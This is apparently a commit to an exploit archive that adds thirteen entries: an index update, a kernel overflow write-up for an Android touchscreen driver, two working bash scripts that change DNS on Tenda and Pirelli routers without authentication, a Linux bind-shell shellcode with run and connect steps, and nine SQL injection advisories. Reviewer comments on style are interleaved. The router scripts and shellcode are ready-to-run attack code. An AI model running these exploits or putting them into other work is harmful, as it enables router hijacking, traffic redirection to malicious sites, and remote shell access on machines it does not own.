DB: 2017-01-20
13 new exploits Google Android TSP sysfs - 'cmd_store' Multiple Overflows Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes) Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change Viral Image & Video Sharing GagZone Script - SQL Injection Image and Video Script - SQL Injection Social News and Bookmarking Script - SQL Injection Viral Image Sharing Script - SQL Injection Vine VideoSite Creator Script - SQL Injection Job Vacancy Script - SQL Injection Home of Viral Images_ Videos and Articles Script - SQL Injection Video Site Creator Script - SQL Injection Classifieds Script - SQL Injection
This commit is contained in:
parent
ef112ace5d
commit
1441edc4aa
14 changed files with 463 additions and 0 deletions
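--- a/files.csv
+++ b/files.csv
@@ -8757,6 +8757,7 @@ id,file,description,date,author,platform,type,port
 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
 41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
 41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0
+41130,platforms/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15830,6 +15831,7 @@ id,file,description,date,author,platform,type,port
 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
+41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37049,4 +37051,15 @@ id,file,description,date,author,platform,type,port
 41112,platforms/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
 41113,platforms/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",php,webapps,0
 41114,platforms/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",php,webapps,0
+41117,platforms/hardware/webapps/41117.sh,"Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps,0
 41116,platforms/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",php,webapps,0
+41118,platforms/hardware/webapps/41118.sh,"Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change",2017-01-19,"Todor Donev",hardware,webapps,0
+41119,platforms/php/webapps/41119.txt,"Viral Image & Video Sharing GagZone Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41120,platforms/php/webapps/41120.txt,"Image and Video Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41121,platforms/php/webapps/41121.txt,"Social News and Bookmarking Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41122,platforms/php/webapps/41122.txt,"Viral Image Sharing Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41123,platforms/php/webapps/41123.txt,"Vine VideoSite Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41124,platforms/php/webapps/41124.txt,"Job Vacancy Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41125,platforms/php/webapps/41125.txt,"Home of Viral Images_ Videos and Articles Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41126,platforms/php/webapps/41126.txt,"Video Site Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0
+41127,platforms/php/webapps/41127.txt,"Classifieds Script - SQL Injection",2017-01-19,"Ihsan Sencan",php,webapps,0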
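Review bot: The new 41125 row writes the title as `"Home of Viral Images_ Videos and Articles Script - SQL Injection"`, replacing the comma with an underscore, while the advisory it indexes (`# Script Name: Home of Viral Images, Videos and Articles Script` in platforms/php/webapps/41125.txt) keeps the comma; the description field is already double-quoted, so an RFC 4180 reader would handle the comma and the title could match the file verbatim unless the index deliberately avoids commas. The 41126 row similarly shortens the file's `VideoZone - Video Site Creator Script` to `Video Site Creator Script`. If both are intentional normalisation, a one-line statement of that convention somewhere in the repository would spare later contributors the same question.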
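--- a/platforms/android/local/41130.txt
+++ b/platforms/android/local/41130.txt
@@ -0,0 +1,73 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=967
+
+The TSP touchscreen controller driver exposes several sysfs entries through which the driver may be configured. One such entry, "cmd", allows the user to write commands to be executed by the driver.
+
+Specifically, the "cmd" entry is writable, and is present under:
+
+/sys/devices/virtual/sec/tsp/cmd
+
+Writes to this sysfs entry are handled by the function "cmd_store", under drivers/input/touchscreen/sec_ts/sec_ts_fn.c
+
+This function fails to validate the length of the supplied buffer, before copying data from it into two memory locations. First, the data is copied into a static structure:
+
+...
+memset(ts->cmd, 0x00, sizeof(ts->cmd));
+memcpy(ts->cmd, buf, length);
+memset(ts->cmd_param, 0, sizeof(ts->cmd_param));
+memset(buffer, 0x00, sizeof(buffer));
+...
+
+The "buf" argument contains the user-supplied data, and the "length" argument is completely user-controlled. Since the length of ts->cmd is defined to be CMD_STR_LEN (256), this memcpy will overflow into adjacent fields in the "ts" structure, allowing the attack to replace these with attack-controlled data.
+
+Second, the user-supplied data is copied into a local stack-allocated buffer, like so:
+
+...
+char buffer[CMD_STR_LEN];
+...
+pos = strchr(buf, (int)delim);
+if (pos)
+memcpy(buffer, buf, pos - buf);
+else
+memcpy(buffer, buf, length);
+...
+
+
+This means that the attacker can also overwrite the data on the stack, including the value of frame pointer and return address, simply by providing a buffer of length >CMD_STR_LEN. This allows the attacker to directly hijack the control flow when the function returns.
+
+I've statically and dynamically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource", the device's build is "XXS1APG3".
+
+The sysfs entries mentioned above have UID "system" and GID "radio". The SELinux context for these entries is: "u:object_r:sysfs_sec:s0".
+
+According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:
+
+allow shell sysfs_sec : file { read open } ;
+allow system_app sysfs_sec : file { ioctl read write getattr lock append open } ;
+allow rild sysfs_sec : file { ioctl read write getattr lock append open } ;
+allow system_app sysfs_sec : dir { ioctl read write getattr add_name remove_name search open } ;
+allow diagexe sysfs_sec : file { ioctl read write getattr lock append open } ;
+allow at_distributor sysfs_sec : file { ioctl read write getattr setattr lock append open } ;
+
+
+Proof of concept for the buffer overflow in the TSP driver.
+
+Includes a short ROP chain which allows execution of any arbitrary function in the context of the linux kernel, with arbitrary arguments. This PoC also uses the KASLR bypass in "pm_qos" to adjust for the KASLR slide).
+
+The high-level flow for executing a function in the kernel is the following:
+-Allocate a (user-space) buffer on the heap with a dummy "marker" value
+-Start a new thread (denote it "Thread B", denote the original thread "Thread A")
+-Thread A:
+-Perform a busy loop waiting for the dummy value to be updated
+-Thread B:
+-Create a ROP chain which does the following:
+-Prepares arguments for a function call
+-Calls the wanted function in the context of the kernel
+-Stores X0 in a sysfs entry in the kernel VAS (e.g., uevent_seqnum)
+-Change the dummy value shared from thread A to indicate completion
+-Enter idle loop
+-Thread A:
+-(Exit busy loop as the marker value has been modified)
+-Read the result of the execution by reading the sysfs entry
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41130.zip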
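--- a/platforms/hardware/webapps/41117.sh
+++ b/platforms/hardware/webapps/41117.sh
@@ -0,0 +1,83 @@
+#!/bin/bash
+#
+# Tenda ADSL2/2+ Modem D820R
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# The malicious code doesn't sleeping, he stalking..
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+echo " Tenda ADSL2/2+ Modem D820R "
+echo " Unauthenticated Remote DNS Change Exploit"
+echo " ==================================================================="
+echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+echo " Example: $0 133.7.133.7 8.8.8.8"
+echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+echo ""
+echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
+echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+echo " Error : libwww-perl not found =/"
+exit;
+fi
+GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+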
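Review bot: The header comment names the device but gives no affected firmware version, no date of vendor notification and no fix or mitigation status, which is exactly what someone triaging this advisory against their own equipment needs; lines such as `# Affected firmware: <version tested>` and `# Vendor status: <notified / unpatched>` under `# Description:` would make the entry usable as a reference. The same header is reused word for word in platforms/hardware/webapps/41118.sh for the Pirelli DRG A115 v3, so the gap applies there too. As a point of style, `GET=\`which GET 2>/dev/null\`` stores the resolved path but the final line invokes bare `GET`, so the variable is dead and only the `$?` test that follows it matters; either call `"$GET"` or drop the assignment and test `which` directly. The usage check also accepts two arguments while the usage text lists three, which the comment could state explicitly (`# Secondary DNS is optional`).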
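--- a/platforms/hardware/webapps/41118.sh
+++ b/platforms/hardware/webapps/41118.sh
@@ -0,0 +1,83 @@
+#!/bin/bash
+#
+# Pirelli DRG A115 v3 ADSL Router
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# The malicious code doesn't sleeping, he stalking..
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+echo " Pirelli DRG A115 v3 "
+echo " Unauthenticated Remote DNS Change Exploit"
+echo " ==================================================================="
+echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+echo " Example: $0 133.7.133.7 8.8.8.8"
+echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+echo ""
+echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
+echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+echo " Error : libwww-perl not found =/"
+exit;
+fi
+GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+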
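--- a/platforms/lin_x86-64/shellcode/41128.c
+++ b/platforms/lin_x86-64/shellcode/41128.c
@@ -0,0 +1,85 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes
+
+Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+400080: 48 31 c0 xor %rax,%rax
+400083: 48 31 d2 xor %rdx,%rdx
+400086: 48 31 f6 xor %rsi,%rsi
+400089: ff c6 inc %esi
+40008b: 6a 29 pushq $0x29
+40008d: 58 pop %rax
+40008e: 6a 02 pushq $0x2
+400090: 5f pop %rdi
+400091: 0f 05 syscall
+400093: 48 97 xchg %rax,%rdi
+400095: 6a 02 pushq $0x2
+400097: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
+40009e: 54 push %rsp
+40009f: 5e pop %rsi
+4000a0: 52 push %rdx
+4000a1: 6a 31 pushq $0x31
+4000a3: 58 pop %rax
+4000a4: 6a 10 pushq $0x10
+4000a6: 5a pop %rdx
+4000a7: 0f 05 syscall
+4000a9: 5e pop %rsi
+4000aa: 6a 32 pushq $0x32
+4000ac: 58 pop %rax
+4000ad: 0f 05 syscall
+4000af: 6a 2b pushq $0x2b
+4000b1: 58 pop %rax
+4000b2: 0f 05 syscall
+4000b4: 48 97 xchg %rax,%rdi
+4000b6: 6a 03 pushq $0x3
+4000b8: 5e pop %rsi
+4000b9: ff ce dec %esi
+4000bb: b0 21 mov $0x21,%al
+4000bd: 0f 05 syscall
+4000bf: 75 f8 jne 0x4000b9
+4000c1: f7 e6 mul %esi
+4000c3: 52 push %rdx
+4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
+4000cb: 2f 73 68
+4000ce: 53 push %rbx
+4000cf: 48 8d 3c 24 lea (%rsp),%rdi
+4000d3: b0 3b mov $0x3b,%al
+4000d5: 0f 05 syscall
+
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o bind_shell bind_shell.c
+$ execstack -s bind_shell
+$ ./bind_shell
+
+How to Connect
+
+$ nc <HOST IP ADDRESS> 5600
+
+Eg:
+
+$ nc 127.0.0.1 5600
+
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
+void main(int argc, char **argv)
+{
+int (*func)();
+func = (int (*)()) sh;
+(int)(*func)();
+}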
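Review bot: `void main(int argc, char **argv)` is not a conforming signature for a hosted C program, and `argc`/`argv` are never read; `int main(void)` with a `return 0;` at the end of the body is the conventional form and compiles without the implicit-int warnings that `void main` draws from gcc. On the next-to-last line, `(int)(*func)();` casts a return value that is immediately discarded, so the cast is a no-op and `(*func)();` says the same thing more plainly. The header's "How To Run" section already records that `execstack -s` is needed before the binary will run, but the reason is not stated next to the code; a one-line comment above `char sh[]` noting that the array sits in a data segment and the build step marks the binary's stack/data executable would save the next reader a trip back to the header (hedged: I am inferring the purpose of that step from the instructions, not from the code).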
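--- a/platforms/php/webapps/41119.txt
+++ b/platforms/php/webapps/41119.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Viral Image & Video Sharing GagZone Script
+# Script Buy Now: http://www.scriptfolder.com/scriptfolder-gagzone/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #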
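--- a/platforms/php/webapps/41120.txt
+++ b/platforms/php/webapps/41120.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Image and Video Script
+# Script Buy Now: http://www.scriptfolder.com/funzone-image-and-video-script/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #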
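--- a/platforms/php/webapps/41121.txt
+++ b/platforms/php/webapps/41121.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Social News and Bookmarking Script
+# Script Buy Now: http://www.scriptfolder.com/scriptfolder-bookmark-drive-social-news-and-bookmarking-script/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #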
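--- a/platforms/php/webapps/41122.txt
+++ b/platforms/php/webapps/41122.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Viral Image Sharing Script
+# Script Buy Now: http://www.scriptfolder.com/scriptfolder-imagegags-viral-image-sharing-script/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #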
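--- a/platforms/php/webapps/41123.txt
+++ b/platforms/php/webapps/41123.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Vine VideoSite Creator Script
+# Script Buy Now: http://www.scriptfolder.com/scriptfolder-vinezone-vine-videosite-creator-script/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #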
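--- a/platforms/php/webapps/41124.txt
+++ b/platforms/php/webapps/41124.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Job Vacancy Script
+# Script Buy Now: http://www.scriptfolder.com/scriptfolder-job-bank-job-vacancy-script/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #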
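--- a/platforms/php/webapps/41125.txt
+++ b/platforms/php/webapps/41125.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Home of Viral Images, Videos and Articles Script
+# Script Buy Now: http://www.scriptfolder.com/viralzone-home-of-viral-images-videos-and-articles/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #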
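--- a/platforms/php/webapps/41126.txt
+++ b/platforms/php/webapps/41126.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: VideoZone - Video Site Creator Script
+# Script Buy Now: http://www.scriptfolder.com/scriptfolder-videozone-video-site-creator/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #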
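--- a/platforms/php/webapps/41127.txt
+++ b/platforms/php/webapps/41127.txt
@@ -0,0 +1,14 @@
+# # # # #
+# Vulnerability: SQL Injection
+# Date: 19.01.2017
+# Vendor Homepage: http://www.scriptfolder.com/
+# Script Name: Classifieds Script
+# Script Buy Now:http://www.scriptfolder.com/scriptfolder-classifieds/
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?term=[SQL]
+# E.t.c....
+# # # # #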